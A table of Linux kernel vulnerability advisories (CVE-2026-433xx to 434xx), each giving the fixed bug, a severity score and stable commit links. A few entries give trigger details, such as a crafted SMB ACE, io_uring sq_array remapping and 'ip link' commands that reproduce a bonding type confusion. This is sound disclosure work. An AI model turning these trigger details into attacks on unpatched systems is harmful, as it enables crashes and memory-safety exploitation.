| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: ipa: fix event ring index not programmed for IPA v5.0+ For IPA v5.0+, the event ring index field moved from CH_C_CNTXT_0 to CH_C_CNTXT_1. The v5.0 register definition intended to define this field in the CH_C_CNTXT_1 fmask array but used the old identifier of ERINDEX instead of CH_ERINDEX. Without a valid event ring, GSI channels could never signal transfer completions. This caused gsi_channel_trans_quiesce() to block forever in wait_for_completion(). At least for IPA v5.2 this resolves an issue seen where runtime suspend, system suspend, and remoteproc stop all hanged forever. It also meant the IPA data path was completely non functional. | 2026-05-08 | 7.5 | CVE-2026-43345 | https://git.kernel.org/stable/c/ae8343a19ccb051d519dbb3a9082ddea9f0551d3 https://git.kernel.org/stable/c/2bf18b643c4656413f7cfd5615af60a6b4e261da https://git.kernel.org/stable/c/2d2dc166d55148cfcf8ae67b415f8d6d110e6fca https://git.kernel.org/stable/c/34c988bb04cbdf093d2134e179433da49ffcd044 https://git.kernel.org/stable/c/56007972c0b1e783ca714d6f1f4d6e66e531d21f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: arm64: dts: qcom: monaco: Reserve full Gunyah metadata region We observe spurious "Synchronous External Abort" exceptions (ESR=0x96000010) and kernel crashes on Monaco-based platforms. These faults are caused by the kernel inadvertently accessing hypervisor-owned memory that is not properly marked as reserved. >From boot log, The Qualcomm hypervisor reports the memory range at 0x91a80000 of size 0x80000 (512 KiB) as hypervisor-owned: qhee_hyp_assign_remove_memory: 0x91a80000/0x80000 -> ret 0 However, the EFI memory map provided by firmware only reserves the subrange 0x91a40000-0x91a87fff (288 KiB). The remaining portion (0x91a88000-0x91afffff) is incorrectly reported as conventional memory (from efi debug): efi: 0x000091a40000-0x000091a87fff [Reserved...] efi: 0x000091a88000-0x0000938fffff [Conventional...] As a result, the allocator may hand out PFNs inside the hypervisor owned region, causing fatal aborts when the kernel accesses those addresses. Add a reserved-memory carveout for the Gunyah hypervisor metadata at 0x91a80000 (512 KiB) and mark it as no-map so Linux does not map or allocate from this area. For the record: Hyp version: gunyah-e78adb36e debug (2025-11-17 05:38:05 UTC) UEFI Ver: 6.0.260122.BOOT.MXF.1.0.c1-00449-KODIAKLA-1 | 2026-05-08 | 7.5 | CVE-2026-43347 | https://git.kernel.org/stable/c/edde62571f7602d83243ca51729ce42d22ea04d2 https://git.kernel.org/stable/c/59bd9088336d2bb7e713dcf4df5cbda86bb3c611 https://git.kernel.org/stable/c/85d98669fa7f1d3041d962515e45ee6e392db6f8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: smb: client: require a full NFS mode SID before reading mode bits parse_dacl() treats an ACE SID matching sid_unix_NFS_mode as an NFS mode SID and reads sid.sub_auth[2] to recover the mode bits. That assumes the ACE carries three subauthorities, but compare_sids() only compares min(a, b) subauthorities. A malicious server can return an ACE with num_subauth = 2 and sub_auth[] = {88, 3}, which still matches sid_unix_NFS_mode and then drives the sub_auth[2] read four bytes past the end of the ACE. Require num_subauth >= 3 before treating the ACE as an NFS mode SID. This keeps the fix local to the special-SID mode path without changing compare_sids() semantics for the rest of cifsacl. | 2026-05-08 | 7.6 | CVE-2026-43350 | https://git.kernel.org/stable/c/b53b8e98c23310294fc45fc686db5ee860311896 https://git.kernel.org/stable/c/c8eef12af1cc73031639ea7cf16e0b10e2536b0b https://git.kernel.org/stable/c/38a69f08ee82c450d3e4168707fff2e317dc3ff7 https://git.kernel.org/stable/c/f8488c07bea2431ee12a6067d736578064fa46b4 https://git.kernel.org/stable/c/2757ad3e4b6f9e0fed4c7739594e702abc5cab21 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: i3c: mipi-i3c-hci: Correct RING_CTRL_ABORT handling in DMA dequeue The logic used to abort the DMA ring contains several flaws: 1. The driver unconditionally issues a ring abort even when the ring has already stopped. 2. The completion used to wait for abort completion is never re-initialized, resulting in incorrect wait behavior. 3. The abort sequence unintentionally clears RING_CTRL_ENABLE, which resets hardware ring pointers and disrupts the controller state. 4. If the ring is already stopped, the abort operation should be considered successful without attempting further action. Fix the abort handling by checking whether the ring is running before issuing an abort, re-initializing the completion when needed, ensuring that RING_CTRL_ENABLE remains asserted during abort, and treating an already stopped ring as a successful condition. | 2026-05-08 | 7.8 | CVE-2026-43352 | https://git.kernel.org/stable/c/003df94bcc9227e8e930abd03ac7f63ac10033dc https://git.kernel.org/stable/c/5549611888f5ca2db5e8e692b57f30626ddf9898 https://git.kernel.org/stable/c/b795e68bf3073d67bebbb5a44d93f49efc5b8cc7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: i3c: mipi-i3c-hci: Fix race in DMA ring dequeue The HCI DMA dequeue path (hci_dma_dequeue_xfer()) may be invoked for multiple transfers that timeout around the same time. However, the function is not serialized and can race with itself. When a timeout occurs, hci_dma_dequeue_xfer() stops the ring, processes incomplete transfers, and then restarts the ring. If another timeout triggers a parallel call into the same function, the two instances may interfere with each other - stopping or restarting the ring at unexpected times. Add a mutex so that hci_dma_dequeue_xfer() is serialized with respect to itself. | 2026-05-08 | 7.8 | CVE-2026-43353 | https://git.kernel.org/stable/c/b684b420a5bb0ea1b0e13abfdb8ce41c5266e62e https://git.kernel.org/stable/c/4faa1e9c67a2229f6749190aedaf88ce0391efd2 https://git.kernel.org/stable/c/1dca8aee80eea76d2aae21265de5dd64f6ba0f09 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: io_uring/kbuf: check if target buffer list is still legacy on recycle There's a gap between when the buffer was grabbed and when it potentially gets recycled, where if the list is empty, someone could've upgraded it to a ring provided type. This can happen if the request is forced via io-wq. The legacy recycling is missing checking if the buffer_list still exists, and if it's of the correct type. Add those checks. | 2026-05-08 | 7.8 | CVE-2026-43366 | https://git.kernel.org/stable/c/a7b33671e418fca507feebd1d56e7f4952a4b25c https://git.kernel.org/stable/c/439a6728ec4641ffad1ca796622c19bc525e570f https://git.kernel.org/stable/c/f3fb54e7a8b4aadcc2836ee463eec8c88709b8aa https://git.kernel.org/stable/c/50ad880db3013c6fee0ef13781762a39e2e7ef83 https://git.kernel.org/stable/c/97b57f69fee1b61b41acbf37e7720cac9d389fa4 https://git.kernel.org/stable/c/c2c185be5c85d37215397c8e8781abf0a69bec1f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/i915: Fix potential overflow of shmem scatterlist length When a scatterlists table of a GEM shmem object of size 4 GB or more is populated with pages allocated from a folio, unsigned int .length attribute of a scatterlist may get overflowed if total byte length of pages allocated to that single scatterlist happens to reach or cross the 4GB limit. As a consequence, users of the object may suffer from hitting unexpected, premature end of the object's backing pages. [278.780187] ------------[ cut here ]------------ [278.780377] WARNING: CPU: 1 PID: 2326 at drivers/gpu/drm/i915/i915_mm.c:55 remap_sg+0x199/0x1d0 [i915] ... [278.780654] CPU: 1 UID: 0 PID: 2326 Comm: gem_mmap_offset Tainted: G S U 6.17.0-rc1-CI_DRM_16981-ged823aaa0607+ #1 PREEMPT(voluntary) [278.780656] Tainted: [S]=CPU_OUT_OF_SPEC, [U]=USER [278.780658] Hardware name: Intel Corporation Meteor Lake Client Platform/MTL-P LP5x T3 RVP, BIOS MTLPFWI1.R00.3471.D91.2401310918 01/31/2024 [278.780659] RIP: 0010:remap_sg+0x199/0x1d0 [i915] ... [278.780786] Call Trace: [278.780787] <TASK> [278.780788] ? __apply_to_page_range+0x3e6/0x910 [278.780795] ? __pfx_remap_sg+0x10/0x10 [i915] [278.780906] apply_to_page_range+0x14/0x30 [278.780908] remap_io_sg+0x14d/0x260 [i915] [278.781013] vm_fault_cpu+0xd2/0x330 [i915] [278.781137] __do_fault+0x3a/0x1b0 [278.781140] do_fault+0x322/0x640 [278.781143] __handle_mm_fault+0x938/0xfd0 [278.781150] handle_mm_fault+0x12c/0x300 [278.781152] ? lock_mm_and_find_vma+0x4b/0x760 [278.781155] do_user_addr_fault+0x2d6/0x8e0 [278.781160] exc_page_fault+0x96/0x2c0 [278.781165] asm_exc_page_fault+0x27/0x30 ... That issue was apprehended by the author of a change that introduced it, and potential risk even annotated with a comment, but then never addressed. When adding folio pages to a scatterlist table, take care of byte length of any single scatterlist not exceeding max_segment. (cherry picked from commit 06249b4e691a75694c014a61708c007fb5755f60) | 2026-05-08 | 7.8 | CVE-2026-43368 | https://git.kernel.org/stable/c/aeb7255531ba4a5c3a64938577170d08b78de399 https://git.kernel.org/stable/c/1c956f0fccc26fefcbb507516c49d1db41c40471 https://git.kernel.org/stable/c/eae4bf4107571283031db96ce132e951615e2ae4 https://git.kernel.org/stable/c/21a301f12d18797bf889c15497f922edfdaece3a https://git.kernel.org/stable/c/029ae067431ab9d0fca479bdabe780fa436706ea |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: Fix use-after-free race in VM acquire Replace non-atomic vm->process_info assignment with cmpxchg() to prevent race when parent/child processes sharing a drm_file both try to acquire the same VM after fork(). (cherry picked from commit c7c573275ec20db05be769288a3e3bb2250ec618) | 2026-05-08 | 7.8 | CVE-2026-43370 | https://git.kernel.org/stable/c/ae87aea330c24f462fc7058ed543ba8bc6798447 https://git.kernel.org/stable/c/46d309996bd9251792d7dafdbaf615cf202b4447 https://git.kernel.org/stable/c/e61e355cbe49e585097eee28c15b862bfb1c0668 https://git.kernel.org/stable/c/c658c1c85ec235b7ecfbf8dbfee385b1332088f4 https://git.kernel.org/stable/c/904025fa8bba1d028adade33346372b4ac1a9249 https://git.kernel.org/stable/c/7885eb335d8f9e9942925d57e300a85e3f82ded4 https://git.kernel.org/stable/c/94b7782d0c8024f5b88454241c8d4777076c3786 https://git.kernel.org/stable/c/2c1030f2e84885cc58bffef6af67d5b9d2e7098f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: ncsi: fix skb leak in error paths Early return paths in NCSI RX and AEN handlers fail to release the received skb, resulting in a memory leak. Specifically, ncsi_aen_handler() returns on invalid AEN packets without consuming the skb. Similarly, ncsi_rcv_rsp() exits early when failing to resolve the NCSI device, response handler, or request, leaving the skb unfreed. | 2026-05-08 | 7.5 | CVE-2026-43373 | https://git.kernel.org/stable/c/9891d7f4f1ede473c54b49776ae07755083eef06 https://git.kernel.org/stable/c/fef5aa6e3bcf3c8053307642663a63b7362d7552 https://git.kernel.org/stable/c/81d6aee32f8f7bbc175c05dbf61f4430bfb88c4a https://git.kernel.org/stable/c/59962588197863d0d746879f193905c0c6b3df49 https://git.kernel.org/stable/c/553366c271479c0d571dd1bb5d1bcde4747fb82e https://git.kernel.org/stable/c/b70c4e5e711931cdd56e6e905737b72f1e649189 https://git.kernel.org/stable/c/87138dde2d6937b12b967f28fe598a7d59000ae4 https://git.kernel.org/stable/c/5c3398a54266541610c8d0a7082e654e9ff3e259 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: nexthop: fix percpu use-after-free in remove_nh_grp_entry When removing a nexthop from a group, remove_nh_grp_entry() publishes the new group via rcu_assign_pointer() then immediately frees the removed entry's percpu stats with free_percpu(). However, the synchronize_net() grace period in the caller remove_nexthop_from_groups() runs after the free. RCU readers that entered before the publish still see the old group and can dereference the freed stats via nh_grp_entry_stats_inc() -> get_cpu_ptr(nhge->stats), causing a use-after-free on percpu memory. Fix by deferring the free_percpu() until after synchronize_net() in the caller. Removed entries are chained via nh_list onto a local deferred free list. After the grace period completes and all RCU readers have finished, the percpu stats are safely freed. | 2026-05-08 | 7.8 | CVE-2026-43374 | https://git.kernel.org/stable/c/abf4feaee6405f1441929c6ebe7a250f2cd170a7 https://git.kernel.org/stable/c/ab5ebab9664214ba41a7633cb4e72f128204f924 https://git.kernel.org/stable/c/9e08ad731862b22a87cc55f752e16d66cdc9e231 https://git.kernel.org/stable/c/b2662e7593e94ae09b1cf7ee5f09160a3612bcb2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: Fix rcu_tasks stall in threaded busypoll I was debugging a NIC driver when I noticed that when I enable threaded busypoll, bpftrace hangs when starting up. dmesg showed: rcu_tasks_wait_gp: rcu_tasks grace period number 85 (since boot) is 10658 jiffies old. rcu_tasks_wait_gp: rcu_tasks grace period number 85 (since boot) is 40793 jiffies old. rcu_tasks_wait_gp: rcu_tasks grace period number 85 (since boot) is 131273 jiffies old. rcu_tasks_wait_gp: rcu_tasks grace period number 85 (since boot) is 402058 jiffies old. INFO: rcu_tasks detected stalls on tasks: 00000000769f52cd: .N nvcsw: 2/2 holdout: 1 idle_cpu: -1/64 task:napi/eth2-8265 state:R running task stack:0 pid:48300 tgid:48300 ppid:2 task_flags:0x208040 flags:0x00004000 Call Trace: <TASK> ? napi_threaded_poll_loop+0x27c/0x2c0 ? __pfx_napi_threaded_poll+0x10/0x10 ? napi_threaded_poll+0x26/0x80 ? kthread+0xfa/0x240 ? __pfx_kthread+0x10/0x10 ? ret_from_fork+0x31/0x50 ? __pfx_kthread+0x10/0x10 ? ret_from_fork_asm+0x1a/0x30 </TASK> The cause is that in threaded busypoll, the main loop is in napi_threaded_poll rather than napi_threaded_poll_loop, where the latter rarely iterates more than once within its loop. For rcu_softirq_qs_periodic inside napi_threaded_poll_loop to report its qs state, the last_qs must be 100ms behind, and this can't happen because napi_threaded_poll_loop rarely iterates in threaded busypoll, and each time napi_threaded_poll_loop is called last_qs is reset to latest jiffies. This patch changes so that in threaded busypoll, last_qs is saved in the outer napi_threaded_poll, and whether busy_poll_last_qs is NULL indicates whether napi_threaded_poll_loop is called for busypoll. This way last_qs would not reset to latest jiffies on each invocation of napi_threaded_poll_loop. | 2026-05-08 | 7.5 | CVE-2026-43385 | https://git.kernel.org/stable/c/52459201d0df3fdbb1d281738b7b772e2cacb49c https://git.kernel.org/stable/c/1a86a1f7d88996085934139fa4c063b6299a2dd3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: libceph: Use u32 for non-negative values in ceph_monmap_decode() This patch fixes unnecessary implicit conversions that change signedness of blob_len and num_mon in ceph_monmap_decode(). Currently blob_len and num_mon are (signed) int variables. They are used to hold values that are always non-negative and get assigned in ceph_decode_32_safe(), which is meant to assign u32 values. Both variables are subsequently used as unsigned values, and the value of num_mon is further assigned to monmap->num_mon, which is of type u32. Therefore, both variables should be of type u32. This is especially relevant for num_mon. If the value read from the incoming message is very large, it is interpreted as a negative value, and the check for num_mon > CEPH_MAX_MON does not catch it. This leads to the attempt to allocate a very large chunk of memory for monmap, which will most likely fail. In this case, an unnecessary attempt to allocate memory is performed, and -ENOMEM is returned instead of -EINVAL. | 2026-05-08 | 7.5 | CVE-2026-43405 | https://git.kernel.org/stable/c/ee5588e2bc41acb73f6676c0520420c107cd0140 https://git.kernel.org/stable/c/86f7060cd638d6eb042e8ed780fb83a59ca0dcb3 https://git.kernel.org/stable/c/5f2806684b05bd24d05c091083b8e2517ba8ffac https://git.kernel.org/stable/c/b268984ae88cb0dcd7a8e8263962c748448e26e8 https://git.kernel.org/stable/c/ba0a4df8c563536857dcbf7b4dbd0f2a15f57ace https://git.kernel.org/stable/c/08bc6173fd611ad5a40f472bf5f15b92aea0fe40 https://git.kernel.org/stable/c/770444611f047dbfd4517ec0bc1b179d40c2f346 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ceph: add a bunch of missing ceph_path_info initializers ceph_mdsc_build_path() must be called with a zero-initialized ceph_path_info parameter, or else the following ceph_mdsc_free_path_info() may crash. Example crash (on Linux 6.18.12): virt_to_cache: Object is not a Slab page! WARNING: CPU: 184 PID: 2871736 at mm/slub.c:6732 kmem_cache_free+0x316/0x400 [...] Call Trace: [...] ceph_open+0x13d/0x3e0 do_dentry_open+0x134/0x480 vfs_open+0x2a/0xe0 path_openat+0x9a3/0x1160 [...] cache_from_obj: Wrong slab cache. names_cache but object is from ceph_inode_info WARNING: CPU: 184 PID: 2871736 at mm/slub.c:6746 kmem_cache_free+0x2dd/0x400 [...] kernel BUG at mm/slub.c:634! Oops: invalid opcode: 0000 [#1] SMP NOPTI RIP: 0010:__slab_free+0x1a4/0x350 Some of the ceph_mdsc_build_path() callers had initializers, but others had not, even though they were all added by commit 15f519e9f883 ("ceph: fix race condition validating r_parent before applying state"). The ones without initializer are suspectible to random crashes. (I can imagine it could even be possible to exploit this bug to elevate privileges.) Unfortunately, these Ceph functions are undocumented and its semantics can only be derived from the code. I see that ceph_mdsc_build_path() initializes the structure only on success, but not on error. Calling ceph_mdsc_free_path_info() after a failed ceph_mdsc_build_path() call does not even make sense, but that's what all callers do, and for it to be safe, the structure must be zero-initialized. The least intrusive approach to fix this is therefore to add initializers everywhere. | 2026-05-08 | 7.8 | CVE-2026-43408 | https://git.kernel.org/stable/c/644b47f0574fd82aeb9d00317eca8d1f2a525c8c https://git.kernel.org/stable/c/8be8911f590813e6f90bc6407ced1b23e50bc5da https://git.kernel.org/stable/c/453df1f4535842bf17ff1885a225e153d7ee3374 https://git.kernel.org/stable/c/43323a5934b660afae687e8e4e95ac328615a5c4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: rust_binder: avoid reading the written value in offsets array When sending a transaction, its offsets array is first copied into the target proc's vma, and then the values are read back from there. This is normally fine because the vma is a read-only mapping, so the target process cannot change the value under us. However, if the target process somehow gains the ability to write to its own vma, it could change the offset before it's read back, causing the kernel to misinterpret what the sender meant. If the sender happens to send a payload with a specific shape, this could in the worst case lead to the receiver being able to privilege escalate into the sender. The intent is that gaining the ability to change the read-only vma of your own process should not be exploitable, so remove this TOCTOU read even though it's unexploitable without another Binder bug. | 2026-05-08 | 7.8 | CVE-2026-43433 | https://git.kernel.org/stable/c/e19afb53f7723b3bd22224f2b0c7dcfa70bb973f https://git.kernel.org/stable/c/3672141c93b7a0c0132bf5d5021a4b7f1d663aaa https://git.kernel.org/stable/c/4cb9e13fec0de7c942f5f927469beb8e48ddd20f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: rust_binder: check ownership before using vma When installing missing pages (or zapping them), Rust Binder will look up the vma in the mm by address, and then call vm_insert_page (or zap_page_range_single). However, if the vma is closed and replaced with a different vma at the same address, this can lead to Rust Binder installing pages into the wrong vma. By installing the page into a writable vma, it becomes possible to write to your own binder pages, which are normally read-only. Although you're not supposed to be able to write to those pages, the intent behind the design of Rust Binder is that even if you get that ability, it should not lead to anything bad. Unfortunately, due to another bug, that is not the case. To fix this, store a pointer in vm_private_data and check that the vma returned by vma_lookup() has the right vm_ops and vm_private_data before trying to use the vma. This should ensure that Rust Binder will refuse to interact with any other VMA. The plan is to introduce more vma abstractions to avoid this unsafe access to vm_ops and vm_private_data, but for now let's start with the simplest possible fix. C Binder performs the same check in a slightly different way: it provides a vm_ops->close that sets a boolean to true, then checks that boolean after calling vma_lookup(), but this is more fragile than the solution in this patch. (We probably still want to do both, but the vm_ops->close callback will be added later as part of the follow-up vma API changes.) It's still possible to remap the vma so that pages appear in the right vma, but at the wrong offset, but this is a separate issue and will be fixed when Rust Binder gets a vm_ops->close callback. | 2026-05-08 | 7.8 | CVE-2026-43434 | https://git.kernel.org/stable/c/20a01f20d1f4064d90a8627aa41b5987f0220bb9 https://git.kernel.org/stable/c/5a472d04fb4b9115fb7d1535bd885cea450f14db https://git.kernel.org/stable/c/8ef2c15aeae07647f530d30f6daaf79eb801bcd1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ALSA: pcm: fix use-after-free on linked stream runtime in snd_pcm_drain() In the drain loop, the local variable 'runtime' is reassigned to a linked stream's runtime (runtime = s->runtime at line 2157). After releasing the stream lock at line 2169, the code accesses runtime->no_period_wakeup, runtime->rate, and runtime->buffer_size (lines 2170-2178) - all referencing the linked stream's runtime without any lock or refcount protecting its lifetime. A concurrent close() on the linked stream's fd triggers snd_pcm_release_substream() → snd_pcm_drop() → pcm_release_private() → snd_pcm_unlink() → snd_pcm_detach_substream() → kfree(runtime). No synchronization prevents kfree(runtime) from completing while the drain path dereferences the stale pointer. Fix by caching the needed runtime fields (no_period_wakeup, rate, buffer_size) into local variables while still holding the stream lock, and using the cached values after the lock is released. | 2026-05-08 | 7.8 | CVE-2026-43437 | https://git.kernel.org/stable/c/9baee36e8c5443411c4629afabafaff8a46a23fd https://git.kernel.org/stable/c/fc71f888994569f87d5bee20b1ac6c9c1e3a7a79 https://git.kernel.org/stable/c/629cf09464cf98670996ea5c191dc9743e6f3f00 https://git.kernel.org/stable/c/ae8f8d30d334bad5b1b3cdb1eb8a0b771f55e432 https://git.kernel.org/stable/c/4a758e9a1f5ed722f83c4dd35f867fe811553bcb https://git.kernel.org/stable/c/c2f64e05a0587a83ec42dbd6b7a7ded79b2ff694 https://git.kernel.org/stable/c/9b1dbd69ba6f8f8c69bc7b77c2ce3b9c6ed05ba6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: sched_ext: Remove redundant css_put() in scx_cgroup_init() The iterator css_for_each_descendant_pre() walks the cgroup hierarchy under cgroup_lock(). It does not increment the reference counts on yielded css structs. According to the cgroup documentation, css_put() should only be used to release a reference obtained via css_get() or css_tryget_online(). Since the iterator does not use either of these to acquire a reference, calling css_put() in the error path of scx_cgroup_init() causes a refcount underflow. Remove the unbalanced css_put() to prevent a potential Use-After-Free (UAF) vulnerability. | 2026-05-08 | 7.8 | CVE-2026-43438 | https://git.kernel.org/stable/c/cc095cd305fddbe25a968e4a78436ff9476cf0f6 https://git.kernel.org/stable/c/6eaaa67d6998f6c30c462b140db8c062e07ec473 https://git.kernel.org/stable/c/bf50f3285eda8a0173625fcdb5f183f96e1008cd https://git.kernel.org/stable/c/1336b579f6079fb8520be03624fcd9ba443c930b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: bonding: Fix nd_tbl NULL dereference when IPv6 is disabled When booting with the 'ipv6.disable=1' parameter, the nd_tbl is never initialized because inet6_init() exits before ndisc_init() is called which initializes it. If bonding ARP/NS validation is enabled, an IPv6 NS/NA packet received on a slave can reach bond_validate_na(), which calls bond_has_this_ip6(). That path calls ipv6_chk_addr() and can crash in __ipv6_chk_addr_and_flags(). BUG: kernel NULL pointer dereference, address: 00000000000005d8 Oops: Oops: 0000 [#1] SMP NOPTI RIP: 0010:__ipv6_chk_addr_and_flags+0x69/0x170 Call Trace: <IRQ> ipv6_chk_addr+0x1f/0x30 bond_validate_na+0x12e/0x1d0 [bonding] ? __pfx_bond_handle_frame+0x10/0x10 [bonding] bond_rcv_validate+0x1a0/0x450 [bonding] bond_handle_frame+0x5e/0x290 [bonding] ? srso_alias_return_thunk+0x5/0xfbef5 __netif_receive_skb_core.constprop.0+0x3e8/0xe50 ? srso_alias_return_thunk+0x5/0xfbef5 ? update_cfs_rq_load_avg+0x1a/0x240 ? srso_alias_return_thunk+0x5/0xfbef5 ? __enqueue_entity+0x5e/0x240 __netif_receive_skb_one_core+0x39/0xa0 process_backlog+0x9c/0x150 __napi_poll+0x30/0x200 ? srso_alias_return_thunk+0x5/0xfbef5 net_rx_action+0x338/0x3b0 handle_softirqs+0xc9/0x2a0 do_softirq+0x42/0x60 </IRQ> <TASK> __local_bh_enable_ip+0x62/0x70 __dev_queue_xmit+0x2d3/0x1000 ? srso_alias_return_thunk+0x5/0xfbef5 ? srso_alias_return_thunk+0x5/0xfbef5 ? packet_parse_headers+0x10a/0x1a0 packet_sendmsg+0x10da/0x1700 ? kick_pool+0x5f/0x140 ? srso_alias_return_thunk+0x5/0xfbef5 ? __queue_work+0x12d/0x4f0 __sys_sendto+0x1f3/0x220 __x64_sys_sendto+0x24/0x30 do_syscall_64+0x101/0xf80 ? exc_page_fault+0x6e/0x170 ? srso_alias_return_thunk+0x5/0xfbef5 entry_SYSCALL_64_after_hwframe+0x77/0x7f </TASK> Fix this by checking ipv6_mod_enabled() before dispatching IPv6 packets to bond_na_rcv(). If IPv6 is disabled, return early from bond_rcv_validate() and avoid the path to ipv6_chk_addr(). | 2026-05-08 | 7.5 | CVE-2026-43441 | https://git.kernel.org/stable/c/49dbfcb70eca5f6f9043594e1e323c74c39e3863 https://git.kernel.org/stable/c/cf6099ef493b94e140b0fad52482a78853115318 https://git.kernel.org/stable/c/c78f01abe535853f13f0b26cd5b1d2f19bf52e2f https://git.kernel.org/stable/c/95faa1459b83fa544191e82ccc73856f03b7741f https://git.kernel.org/stable/c/c9c238066fb254dabf65e27379f93c56112c5b96 https://git.kernel.org/stable/c/30021e969d48e5819d5ae56936c2f34c0f7ce997 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: io_uring: fix physical SQE bounds check for SQE_MIXED 128-byte ops When IORING_SETUP_SQE_MIXED is used without IORING_SETUP_NO_SQARRAY, the boundary check for 128-byte SQE operations in io_init_req() validated the logical SQ head position rather than the physical SQE index. The existing check: !(ctx->cached_sq_head & (ctx->sq_entries - 1)) ensures the logical position isn't at the end of the ring, which is correct for NO_SQARRAY rings where physical == logical. However, when sq_array is present, an unprivileged user can remap any logical position to an arbitrary physical index via sq_array. Setting sq_array[N] = sq_entries - 1 places a 128-byte operation at the last physical SQE slot, causing the 128-byte memcpy in io_uring_cmd_sqe_copy() to read 64 bytes past the end of the SQE array. Replace the cached_sq_head alignment check with a direct validation of the physical SQE index, which correctly handles both sq_array and NO_SQARRAY cases. | 2026-05-08 | 7.1 | CVE-2026-43442 | https://git.kernel.org/stable/c/1f794f9bed3e5cf7250a3b4daf112a72ed1513e9 https://git.kernel.org/stable/c/6f02c6b196036dbb6defb4647d8707d29b7fe95b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iavf: fix PTP use-after-free during reset Commit 7c01dbfc8a1c5f ("iavf: periodically cache PHC time") introduced a worker to cache PHC time, but failed to stop it during reset or disable. This creates a race condition where `iavf_reset_task()` or `iavf_disable_vf()` free adapter resources (AQ) while the worker is still running. If the worker triggers `iavf_queue_ptp_cmd()` during teardown, it accesses freed memory/locks, leading to a crash. Fix this by calling `iavf_ptp_release()` before tearing down the adapter. This ensures `ptp_clock_unregister()` synchronously cancels the worker and cleans up the chardev before the backing resources are destroyed. | 2026-05-08 | 7.8 | CVE-2026-43447 | https://git.kernel.org/stable/c/1b034f2429ce6b45ce74dc266175d277acafc5c4 https://git.kernel.org/stable/c/90cc8b2add29b57288025b51c70bc647e7cccb12 https://git.kernel.org/stable/c/efc54fb13d79117a825fef17364315a58682c7ec |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netfilter: nf_tables: Fix for duplicate device in netdev hooks When handling NETDEV_REGISTER notification, duplicate device registration must be avoided since the device may have been added by nft_netdev_hook_alloc() already when creating the hook. | 2026-05-08 | 7.8 | CVE-2026-43454 | https://git.kernel.org/stable/c/6d2a95c6890577cc3eab2b20018e16850d7fb094 https://git.kernel.org/stable/c/2041cdb078041611510fc189410bc70b29f688fb https://git.kernel.org/stable/c/b7cdc5a97d02c943f4bdde4d5767ad0c13cad92b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bonding: fix type confusion in bond_setup_by_slave() kernel BUG at net/core/skbuff.c:2306! Oops: invalid opcode: 0000 [#1] SMP KASAN NOPTI RIP: 0010:pskb_expand_head+0xa08/0xfe0 net/core/skbuff.c:2306 RSP: 0018:ffffc90004aff760 EFLAGS: 00010293 RAX: 0000000000000000 RBX: ffff88807e3c8780 RCX: ffffffff89593e0e RDX: ffff88807b7c4900 RSI: ffffffff89594747 RDI: ffff88807b7c4900 RBP: 0000000000000820 R08: 0000000000000005 R09: 0000000000000000 R10: 00000000961a63e0 R11: 0000000000000000 R12: ffff88807e3c8780 R13: 00000000961a6560 R14: dffffc0000000000 R15: 00000000961a63e0 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007fe1a0ed8df0 CR3: 000000002d816000 CR4: 00000000003526f0 Call Trace: <TASK> ipgre_header+0xdd/0x540 net/ipv4/ip_gre.c:900 dev_hard_header include/linux/netdevice.h:3439 [inline] packet_snd net/packet/af_packet.c:3028 [inline] packet_sendmsg+0x3ae5/0x53c0 net/packet/af_packet.c:3108 sock_sendmsg_nosec net/socket.c:727 [inline] __sock_sendmsg net/socket.c:742 [inline] ____sys_sendmsg+0xa54/0xc30 net/socket.c:2592 ___sys_sendmsg+0x190/0x1e0 net/socket.c:2646 __sys_sendmsg+0x170/0x220 net/socket.c:2678 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0x106/0xf80 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7fe1a0e6c1a9 When a non-Ethernet device (e.g. GRE tunnel) is enslaved to a bond, bond_setup_by_slave() directly copies the slave's header_ops to the bond device: bond_dev->header_ops = slave_dev->header_ops; This causes a type confusion when dev_hard_header() is later called on the bond device. Functions like ipgre_header(), ip6gre_header(),all use netdev_priv(dev) to access their device-specific private data. When called with the bond device, netdev_priv() returns the bond's private data (struct bonding) instead of the expected type (e.g. struct ip_tunnel), leading to garbage values being read and kernel crashes. Fix this by introducing bond_header_ops with wrapper functions that delegate to the active slave's header_ops using the slave's own device. This ensures netdev_priv() in the slave's header functions always receives the correct device. The fix is placed in the bonding driver rather than individual device drivers, as the root cause is bond blindly inheriting header_ops from the slave without considering that these callbacks expect a specific netdev_priv() layout. The type confusion can be observed by adding a printk in ipgre_header() and running the following commands: ip link add dummy0 type dummy ip addr add 10.0.0.1/24 dev dummy0 ip link set dummy0 up ip link add gre1 type gre local 10.0.0.1 ip link add bond1 type bond mode active-backup ip link set gre1 master bond1 ip link set gre1 up ip link set bond1 up ip addr add fe80::1/64 dev bond1 | 2026-05-08 | 7.8 | CVE-2026-43456 | https://git.kernel.org/stable/c/9baf26a91565b7bb2b1d9f99aaf884a2b28c2f6d https://git.kernel.org/stable/c/6ac890f1d60ac3707ee8dae15a67d9a833e49956 